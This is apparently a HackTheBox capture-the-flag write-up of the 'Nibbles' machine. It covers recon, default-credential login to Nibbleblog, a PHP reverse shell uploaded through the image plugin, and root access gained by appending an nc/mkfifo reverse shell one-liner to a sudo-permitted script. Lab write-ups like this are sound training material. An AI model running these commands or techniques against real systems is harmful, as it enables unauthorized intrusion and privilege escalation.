Nibbles HTB Writeup

Viren Saroha
Jun 30, 2021

Hi everyone, this is my writeup for the box “Nibbles” on HackTheBox.

Nudge Section :

→ View the source code of the main webpage.

→ Try “admin/nibbles” to log in to the admin dashboard.

→ Use the Image plugin exploit to get a reverse shell.

→ Append code to monitor.sh to get a reverse shell as root.

IP address of the Machine : 10.10.10.75

Part 1 : Recon

1. Starting off with an Nmap scan to find the open ports and the services behind them.

nmap -sC -sV -Pn 10.10.10.75

We get the following results from the nmap scan.

We have 2 Ports open :

Port 22 : Running OpenSSH 7.2p2

Port 80 : Running Apache 2.4.18

Part 2 : Enumeration

  1. Let’s begin our enumeration by visiting the webpage on port 80.

Analyzing the source code of the webpage gives us an interesting endpoint: /nibbleblog.

Before enumerating further, let’s run a gobuster scan on it.

The gobuster scan gives us some interesting endpoints to test.

The webpage on /nibbleblog looked like this

Now let’s search for a Nibbleblog exploit. Unfortunately we don’t yet know which version of Nibbleblog is running, but visiting the /README endpoint we got from gobuster reveals the version number.

Now that we have the version number, let’s search for an exploit for it. There are several exploits out there, but we will use this one :

Reading through (and trying) the exploit shows that it only works for authenticated users: it needs valid admin credentials before it can upload anything.

But we don’t have any username/password combination to log in with. So, I started visiting the endpoints we got from the gobuster scan.

Visiting /update.php reveals some more interesting endpoints.

Visiting the above endpoints wasn’t much help, BUT… the endpoint /content/private/users.xml gave us the name of the user, i.e. “admin”.

Now that we have a username and a login page at /admin.php, let’s try to log in with some commonly used credentials.

After a few common guesses like admin/password and admin/admin, we find that the combination that works is admin/nibbles. Keep the list of guesses short: Nibbleblog blacklists the client IP for a while after a handful of failed login attempts, so pointing a brute-force tool at this form will just lock you out.

Part 3 : Getting Reverse Shell

Since we are logged in now, we can upload our reverse shell through the Image plugin (my_image), as described in the exploit above.

After uploading the reverse shell, start a netcat listener on the port your shell calls back to and visit the endpoint /nibbleblog/content/private/plugins/my_image/ . The plugin saves the upload in that directory as image.php, so the directory listing shows it, and requesting it executes our PHP.

And… we got a shell. Now let’s make the shell stable using the commands below :

python3 -c 'import pty;pty.spawn("/bin/bash")'

Ctrl+Z

stty raw -echo;fg

Part 4: Getting User Flag

We can get the user flag by changing directory to /home/nibbler

Part 5: Getting Root Flag

Now let’s start our journey of privilege escalation by running the command sudo -l. It shows that we can run the script /home/nibbler/personal/stuff/monitor.sh as root without a password.

The script monitor.sh lives inside the zipped folder personal.zip, so let’s unzip it first.

Observe the permissions of the script in the above screenshot: the file is owned by nibbler and writable by us. That means we can append our own code to monitor.sh and then run it as root. (Even if the file were not writable, we own the directory it sits in, so we could delete it and create our own monitor.sh at that path.) So, let’s append a reverse shell one-liner to the script and run it with sudo, using the exact path listed by sudo -l. Start a netcat listener on your machine first, then :

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 4444 > /tmp/f" >> /home/nibbler/personal/stuff/monitor.sh

sudo /home/nibbler/personal/stuff/monitor.sh

Anddd…. we have the root flag.

Some more things I found along the way…

→ Visit the endpoint /nibbleblog/content/private/upload to see some nice pics.

→ Visit the endpoint /nibbleblog/content/private/config.xml

Thanks for reading the writeup. I hope you liked it. Any type of feedback or suggestions are appreciated.

You can reach out to me on :

Twitter : https://twitter.com/Viren2737

LinkedIn : https://www.linkedin.com/in/viren-saroha-3391371a3/
